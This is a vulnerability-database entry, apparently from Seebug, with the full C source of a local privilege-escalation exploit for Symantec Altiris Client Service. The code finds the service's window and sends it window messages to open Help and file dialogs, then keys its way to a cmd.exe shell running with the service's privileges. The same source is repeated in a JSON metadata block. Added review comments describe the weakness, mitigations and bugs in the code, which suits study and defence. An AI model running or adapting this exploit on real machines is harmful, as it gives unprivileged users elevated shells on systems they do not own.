ID SSV:8460
Type seebug
Reporter Root
Modified 2008-05-17T00:00:00
Description
No description provided by source.
// 0day PRIVATE NOT DISTRIBUTE!!!
//
// Symantec Altiris Client Service Local Exploit (0day)
//
// Affected Versions : Altiris Client 6.5.248
// Altiris Client 6.5.299
// Altiris client 6.8.378
//
// Alex Hernandez aka alt3kx
// ahernandez [at] sybsecurity.com
//
// Eduardo Vela aka sirdarckcat
// sirdarckcat [at] gmail.com
//
// We'll see you soon at ph-neutral 0x7d8
#include "stdio.h"
#include "windows.h"
/*
 * Proof-of-concept driver for the privilege-escalation issue described in the
 * banner: it locates the "Altiris Client Service" top-level window, sends it
 * window messages so that a Help window and an "Open" file dialog appear, and
 * then steers that dialog through keystroke/menu messages until a cmd.exe
 * window exists. Everything here is plain Win32 message passing with fixed
 * Sleep() delays between steps; success is inferred only from window titles.
 *
 * Weakness class (defender's view): a privileged process exposes a window on
 * the interactive desktop and acts on messages from an unprivileged process,
 * so any logged-in user can drive its UI. General mitigations are to keep
 * services off the interactive desktop and to rely on session/integrity
 * isolation of the UI; NOTE(review): whether a vendor fix exists is not
 * stated on this page. Presumably a Help/Open dialog owned by the service
 * process, or a cmd.exe child of it, is the observable indicator — confirm.
 *
 * argv[1] (optional): a numeric language id used to pick the localized
 * window titles below. Returns 0 on every path, success or failure.
 *
 * Review findings (code left as-is):
 *  - langH/langO are uninitialized; only indices 0x09, 0x0a and 0x0c are
 *    filled, so any other id reads indeterminate bytes.
 *  - `if (langH[atoi(argv[1])])` is always true (an array converts to a
 *    non-null pointer) and the index is unchecked, so an argument outside
 *    0..254 indexes out of bounds (undefined behavior); the "Lang not
 *    supported" branch is unreachable.
 *  - The verifier's C11 toolchain has no windows.h; this compiles only on
 *    Windows, as the original did.
 */
int main(int argc, char* argv[])
{
HWND lHandle, lHandle2;
POINT point;
int id,a=0;
/* Window-title tables indexed by primary language id (see note above). */
char langH[255][255];
char langO[255][255];
char wname[]="Altiris Client Service";
/* Help-window titles: 0x0c French, 0x09 English, 0x0a Spanish. */
strcpy(langH[0x0c],"Aide de Windows");
strcpy(langH[0x09],"Windows Help");
strcpy(langH[0x0a],"Ayuda de Windows");
/* Matching "Open" dialog titles for the same three ids. */
strcpy(langO[0x0c],"Ouvrir");
strcpy(langO[0x09],"Open");
strcpy(langO[0x0a],"Abrir");
printf("##########################################################\n");
printf("# Altiris Client Service #\n");
printf("# WM_COMMANDHELP Windows Privilege Escalation Exploit #\n");
printf("# by sirdarckcat & alt3kx #\n");
printf("# #\n");
printf("# This exploit is based on www.milw0rm.com/exploits/350 #\n");
printf("# Utility Manager Privilege Elevation Exploit (MS04-019) #\n");
printf("# by Cesar Cerrudo #\n");
printf("##########################################################\n\n");
/* Guess the language from the system locale first. The fallback branch only
 * runs when the system id is 0 AND the user id is non-zero, in which case
 * it forces English (9). If both are 0, id stays 0 and langH[0] is read
 * uninitialized later. */
id=PRIMARYLANGID(GetSystemDefaultLangID());
if (id==0 && (id=PRIMARYLANGID(GetUserDefaultLangID()))){
printf("Lang not found, using english\n");
id=9;
}
/* Text typed into the dialog's file-name field (WM_SETTEXT below). */
char sText[]="%windir%\\system32\\cmd.ex?";
if (argc<2){
printf("Use:\n> %s [LANG-ID]\n\n",argv[0]);
printf("Look for your LANG-ID here:\n");
printf("http://msdn2.microsoft.com/en-us/library/ms776294.aspx\n");
printf("\nAnyway, the program will try to guess it.\n\n");
return 0;
}else{
if (argc==2){
/* Always true: langH[...] is an array, not a populated-check. Index is
 * not range-checked (atoi of non-numeric input yields 0). */
if (langH[atoi(argv[1])]){
id=atoi(argv[1]);
printf("Lang changed\n");
}else{
/* Unreachable; also passes an unused extra printf argument. */
printf("Lang not supported\n",id);
}
}
}
printf("Using Lang %d\n",id);
printf("Looking for %s..\n",wname);
/* Top-level window owned by the service, found by title only. */
lHandle=FindWindow(NULL, wname);
if (!lHandle) {
printf("Window %s not found\n", wname);
return 0;
}else{
printf("Found! exploiting..\n");
}
/* 0x313 is not named anywhere on this page; intent not recoverable here.
 * NULL is passed where WPARAM/LPARAM integers are expected. */
PostMessage(lHandle,0x313,NULL,NULL);
Sleep(100);
/* 0x365 is presumably WM_COMMANDHELP, the message the banner names. */
SendMessage(lHandle,0x365,NULL,0x1);
Sleep(300);
/* Retry label: if the localized help title is not found, fall back to
 * English once (id=9), then give up. */
pp:
if (!FindWindow(NULL, langH[id])){
printf("Help Window not found.. exploit unsuccesful\n");
if (id!=9){
printf("Trying with english..\n");
id=9;
goto pp;
}else{
return 0;
}
}else{
printf("Help Window found! exploiting..\n");
}
/* Enter keystroke to the help window; expected to raise an "Open" dialog. */
SendMessage (FindWindow(NULL, langH[id]), WM_IME_KEYDOWN, VK_RETURN, 0);
Sleep(500);
/* "#32770" is the standard dialog window class; title is the localized "Open". */
lHandle = FindWindow("#32770",langO[id]);
/* Control ids 0x47C / 0x4A0 / 0x1 are assumed to be the dialog's file-name
 * field, a neighbouring control and the file list — TODO confirm; the page
 * does not name them. A NULL lHandle is not checked here. */
lHandle2 = GetDlgItem(lHandle, 0x47C);
Sleep(500);
printf("Sending path..\n");
SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText);
Sleep(800);
SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);
lHandle2 = GetDlgItem(lHandle, 0x4A0);
printf("Looking for cmd..\n");
SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
Sleep(500);
lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);
lHandle2 = GetDlgItem(lHandle2, 0x1);
printf("Sending keys..\n");
/* 0x43, 0x4D, 0x44 are the virtual-key codes for 'C', 'M', 'D'. */
SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0);
SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0);
SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0);
Sleep(500);
/* Second retry label: the context-menu sequence below runs at most twice
 * (guarded by `a`). */
mark:
PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);
Sleep(1000);
/* Hard-coded screen point assumed to land on the popup menu — fragile. */
point.x =10; point.y =30;
lHandle2=WindowFromPoint(point);
Sleep(1000);
printf("Opening shell..\n");
SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);
Sleep(1000);
SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);
Sleep(1000);
SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0);
Sleep(1000);
/* Success is judged purely by a cmd.exe window title at two fixed paths;
 * any other install root reports "Failed" even if a shell appeared. */
if (!FindWindow(NULL,"C:\\WINDOWS\\system32\\cmd.exe") && !FindWindow(NULL,"C:\\WINNT\\system32\\cmd.exe")){
printf("Failed\n");
if (!a){
a++;
goto mark;
}
}else{
printf("Done!\n");
}
/* Cleanup runs only when the first attempt succeeded (a==0); after a retry
 * the "failed" message prints even if the retry printed "Done!".
 * The last FindWindow uses argv[1] (the language id) as a window title —
 * looks unintended; argc>=2 is guaranteed here by the early return above. */
if(!a){
SendMessage (lHandle, WM_CLOSE,0,0);
Sleep(500);
SendMessage (FindWindow(NULL, langH[id]), WM_CLOSE, 0, 0);
SendMessage (FindWindow(NULL, argv[1]), WM_CLOSE, 0, 0);
}else{
printf("The exploit failed, but maybe the context window of the shell is visibile.\n");
}
return 0;
}
{"sourceData": "\n //\u00a00day\u00a0PRIVATE\u00a0NOT\u00a0DISTRIBUTE!!!\r\n//\r\n//\u00a0Symantec\u00a0Altiris\u00a0Client\u00a0Service\u00a0Local\u00a0Exploit\u00a0(0day)\u00a0\r\n//\r\n//\u00a0Affected\u00a0Versions\t:\u00a0Altiris\u00a0Client\u00a06.5.248\r\n//\t\t\t\u00a0\u00a0Altiris\u00a0Client\u00a06.5.299\r\n//\t\t\t\u00a0\u00a0Altiris\u00a0client\u00a06.8.378\r\n//\r\n//\u00a0Alex\u00a0Hernandez\u00a0aka\u00a0alt3kx\u00a0\r\n//\u00a0ahernandez\u00a0[at]\u00a0sybsecurity.com\r\n//\r\n//\u00a0Eduardo\u00a0Vela\u00a0aka\u00a0sirdarckcat\u00a0\r\n//\u00a0sirdarckcat\u00a0[at]\u00a0gmail.com\r\n//\r\n//\u00a0We'll\u00a0see\u00a0you\u00a0soon\u00a0at\u00a0ph-neutral\u00a00x7d8\r\n\r\n#include\u00a0"stdio.h"\r\n#include\u00a0"windows.h"\r\n\r\nint\u00a0main(int\u00a0argc,\u00a0char*\u00a0argv[])\r\n{\r\n\u00a0HWND\u00a0lHandle,\u00a0lHandle2;\r\n\u00a0POINT\u00a0point;\r\n\u00a0int\u00a0id,a=0;\r\n\u00a0char\u00a0langH[255][255];\r\n\u00a0char\u00a0langO[255][255];\r\n\u00a0char\u00a0wname[]="Altiris\u00a0Client\u00a0Service";\r\n\u00a0\r\n\u00a0strcpy(langH[0x0c],"Aide\u00a0de\u00a0Windows");\r\n\u00a0strcpy(langH[0x09],"Windows\u00a0Help");\r\n\u00a0strcpy(langH[0x0a],"Ayuda\u00a0de\u00a0Windows");\r\n\u00a0\r\n\u00a0strcpy(langO[0x0c],"Ouvrir");\r\n\u00a0strcpy(langO[0x09],"Open");\r\n\u00a0strcpy(langO[0x0a],"Abrir");\r\n\u00a0\r\n\u00a0printf("##########################################################\\n");\r\n\u00a0printf("#\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Altiris\u00a0Client\u00a0Service\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0#\\n");\r\n\u00a0printf("#\u00a0WM_COMMANDHELP\u00a0Windows\u00a0Privilege\u00a0Escalation\u00a0Exploit\u00a0\u00a0\u00a0\u00a0#\\n");\r\n\u00a0printf("#\u00a0by\u00a0sirdarckcat\u00a0&\u00a0alt3kx\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u
00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0#\\n");\r\n\u00a0printf("#\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0#\\n");\r\n\u00a0printf("#\u00a0This\u00a0exploit\u00a0is\u00a0based\u00a0on\u00a0www.milw0rm.com/exploits/350\u00a0\u00a0#\\n");\r\n\u00a0printf("#\u00a0Utility\u00a0Manager\u00a0Privilege\u00a0Elevation\u00a0Exploit\u00a0(MS04-019)\u00a0#\\n");\r\n\u00a0printf("#\u00a0by\u00a0Cesar\u00a0Cerrudo\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0#\\n");\r\n\u00a0printf("##########################################################\\n\\n");\r\n\u00a0\u00a0\r\n\u00a0id=PRIMARYLANGID(GetSystemDefaultLangID());\r\n\u00a0if\u00a0(id==0\u00a0&&\u00a0(id=PRIMARYLANGID(GetUserDefaultLangID()))){\r\n\u00a0\u00a0\u00a0\u00a0printf("Lang\u00a0not\u00a0found,\u00a0using\u00a0english\\n");\r\n\u00a0\u00a0\u00a0\u00a0id=9;\r\n\u00a0}\r\n\r\n\u00a0char\u00a0sText[]="%windir%\\\\system32\\\\cmd.ex?";\r\n\r\n\u00a0if\u00a0(argc<2){\r\n\u00a0\u00a0\u00a0\u00a0printf("Use:\\n>\u00a0%s\u00a0[LANG-ID]\\n\\n",argv[0]);\r\n\u00a0\u00a0\u00a0\u00a0printf("Look\u00a0for\u00a0your\u00a0LANG-ID\u00a0here:\\n");\r\n\u00a0\u00a0\u00a0\u00a0printf("http://msdn2.microsoft.com/en-us/library/ms776294.aspx\\n");\r\n\u00a0\u00a0\u00a0\u00a0printf("\\nAnyway,\u00a0the\u00a0program\u00a0will\u00a0try\u00a0to\u00a0guess\u00a0it.\\n\\n");\r\n\u00a0\u00a0\u00a0\u00a0return\u00a00;\r\n\u00a0}else{\r\n\u00a0\u00a0\u00a0\u00a0if\u00a0(argc==2){\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if\u00a
0(langH[atoi(argv[1])]){\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0id=atoi(argv[1]);\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0printf("Lang\u00a0changed\\n");\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0}else{\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0printf("Lang\u00a0not\u00a0supported\\n",id);\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0}\r\n\u00a0\u00a0\u00a0\u00a0}\r\n\u00a0}\r\n\u00a0printf("Using\u00a0Lang\u00a0%d\\n",id);\r\n\u00a0printf("Looking\u00a0for\u00a0%s..\\n",wname);\r\n\u00a0lHandle=FindWindow(NULL,\u00a0wname);\u00a0\u00a0\u00a0\r\n\u00a0if\u00a0(!lHandle)\u00a0{\r\n\u00a0\u00a0printf("Window\u00a0%s\u00a0not\u00a0found\\n",\u00a0wname);\r\n\u00a0\u00a0return\u00a00;\r\n\u00a0}else{\r\n\u00a0\u00a0printf("Found!\u00a0exploiting..\\n");\r\n\u00a0}\r\n\u00a0PostMessage(lHandle,0x313,NULL,NULL);\r\n\u00a0\r\n\u00a0Sleep(100);\r\n\r\n\u00a0SendMessage(lHandle,0x365,NULL,0x1);\r\n\u00a0Sleep(300);\r\n\u00a0pp:\r\n\u00a0if\u00a0(!FindWindow(NULL,\u00a0langH[id])){\r\n\u00a0\u00a0\u00a0\u00a0printf("Help\u00a0Window\u00a0not\u00a0found..\u00a0exploit\u00a0unsuccesful\\n");\r\n\u00a0\u00a0\u00a0\u00a0if\u00a0(id!=9){\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0printf("Trying\u00a0with\u00a0english..\\n");\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0id=9;\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0goto\u00a0pp;\r\n\u00a0\u00a0\u00a0\u00a0}else{\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return\u00a00;\r\n\u00a0\u00a0\u00a0\u00a0}\u00a0\r\n\u00a0}else{\r\n\u00a0\u00a0\u00a0\u00a0printf("Help\u00a0Window\u00a0found!\u00a0exploiting..\\n");\r\n\u00a0}\u00a0\r\n\u00a0SendMessage\u00a0(FindWindow(NULL,\u00a0langH[id]),\u00a0WM_IME_KEYDOWN,\u00a0VK_RETURN,\u00a00);\r\n\u00a0Sleep(500);\r\n\u00a0lHandle\u00a0=\u00a0FindWindow("#32770",langO[id]);\r\n\u00a0lHandle2\u00a0=\u00a0GetDlgItem(lHandle,\u00a00x47C);\r\n\u00a0Sleep(500);\r\n\u00a0printf("Sending\u00a0path..\\n");\r\n
\u00a0SendMessage\u00a0(lHandle2,\u00a0WM_SETTEXT,\u00a00,\u00a0(LPARAM)sText);\r\n\u00a0Sleep(800);\r\n\u00a0SendMessage\u00a0(lHandle2,\u00a0WM_IME_KEYDOWN,\u00a0VK_RETURN,\u00a00);\r\n\u00a0lHandle2\u00a0=\u00a0GetDlgItem(lHandle,\u00a00x4A0);\r\n\u00a0printf("Looking\u00a0for\u00a0cmd..\\n");\u00a0\r\n\u00a0SendMessage\u00a0(lHandle2,\u00a0WM_IME_KEYDOWN,\u00a0VK_TAB,\u00a00);\r\n\u00a0Sleep(500);\r\n\u00a0lHandle2\u00a0=\u00a0FindWindowEx(lHandle,NULL,"SHELLDLL_DefView",\u00a0NULL);\r\n\u00a0lHandle2\u00a0=\u00a0GetDlgItem(lHandle2,\u00a00x1);\r\n\u00a0printf("Sending\u00a0keys..\\n");\r\n\u00a0SendMessage\u00a0(lHandle2,\u00a0WM_IME_KEYDOWN,\u00a00x43,\u00a00);\r\n\u00a0SendMessage\u00a0(lHandle2,\u00a0WM_IME_KEYDOWN,\u00a00x4D,\u00a00);\r\n\u00a0SendMessage\u00a0(lHandle2,\u00a0WM_IME_KEYDOWN,\u00a00x44,\u00a00);\r\n\u00a0Sleep(500);\r\n\u00a0mark:\r\n\u00a0PostMessage\u00a0(lHandle2,\u00a0WM_CONTEXTMENU,\u00a00,\u00a00);\r\n\u00a0Sleep(1000);\r\n\u00a0point.x\u00a0=10;\u00a0point.y\u00a0=30;\r\n\u00a0lHandle2=WindowFromPoint(point);\r\n\u00a0\u00a0Sleep(1000);\r\n\u00a0printf("Opening\u00a0shell..\\n");\r\n\u00a0SendMessage\u00a0(lHandle2,\u00a0WM_KEYDOWN,\u00a0VK_DOWN,\u00a00);\r\n\u00a0\u00a0Sleep(1000);\r\n\u00a0SendMessage\u00a0(lHandle2,\u00a0WM_KEYDOWN,\u00a0VK_DOWN,\u00a00);\r\n\u00a0\u00a0Sleep(1000);\r\n\u00a0SendMessage\u00a0(lHandle2,\u00a0WM_KEYDOWN,\u00a0VK_RETURN,\u00a00);\r\n\u00a0\u00a0Sleep(1000);\r\n\u00a0if\u00a0(!FindWindow(NULL,"C:\\\\WINDOWS\\\\system32\\\\cmd.exe")\u00a0&&\u00a0!FindWindow(NULL,"C:\\\\WINNT\\\\system32\\\\cmd.exe")){\r\n\u00a0\u00a0\u00a0\u00a0printf("Failed\\n");\r\n\u00a0\u00a0\u00a0\u00a0if\u00a0(!a){\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0a++;\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0goto\u00a0mark;\r\n\u00a0\u00a0\u00a0\u00a0}\r\n\u00a0}else{\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0printf("Done!\\n");\r\n\u00a0}\r\n\u00a0if(!a){\r\n\u00a0\u00a0\u00a0\u00a0SendMessage\u00a0(lHandle,\u00a0
WM_CLOSE,0,0);\r\n\u00a0\u00a0\u00a0\u00a0Sleep(500);\r\n\u00a0\u00a0\u00a0\u00a0SendMessage\u00a0(FindWindow(NULL,\u00a0langH[id]),\u00a0WM_CLOSE,\u00a00,\u00a00);\r\n\u00a0\u00a0\u00a0\u00a0SendMessage\u00a0(FindWindow(NULL,\u00a0argv[1]),\u00a0WM_CLOSE,\u00a00,\u00a00);\r\n\u00a0}else{\r\n\u00a0\u00a0\u00a0\u00a0printf("The\u00a0exploit\u00a0failed,\u00a0but\u00a0maybe\u00a0the\u00a0context\u00a0window\u00a0of\u00a0the\u00a0shell\u00a0is\u00a0visibile.\\n");\r\n\u00a0}\r\n\u00a0return\u00a00;\r\n}\n ", "status": "poc", "description": "No description provided by source.", "sourceHref": "https://www.seebug.org/vuldb/ssvid-8460", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-8460", "type": "seebug", "viewCount": 4, "references": [], "lastseen": "2017-11-19T21:41:56", "published": "2008-05-17T00:00:00", "cvelist": [], "id": "SSV:8460", "enchantments_done": [], "modified": "2008-05-17T00:00:00", "title": "Symantec Altiris Client Service 6.8.378 Local Privilege Escalation Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 0.3, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.3}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645572444}}
{}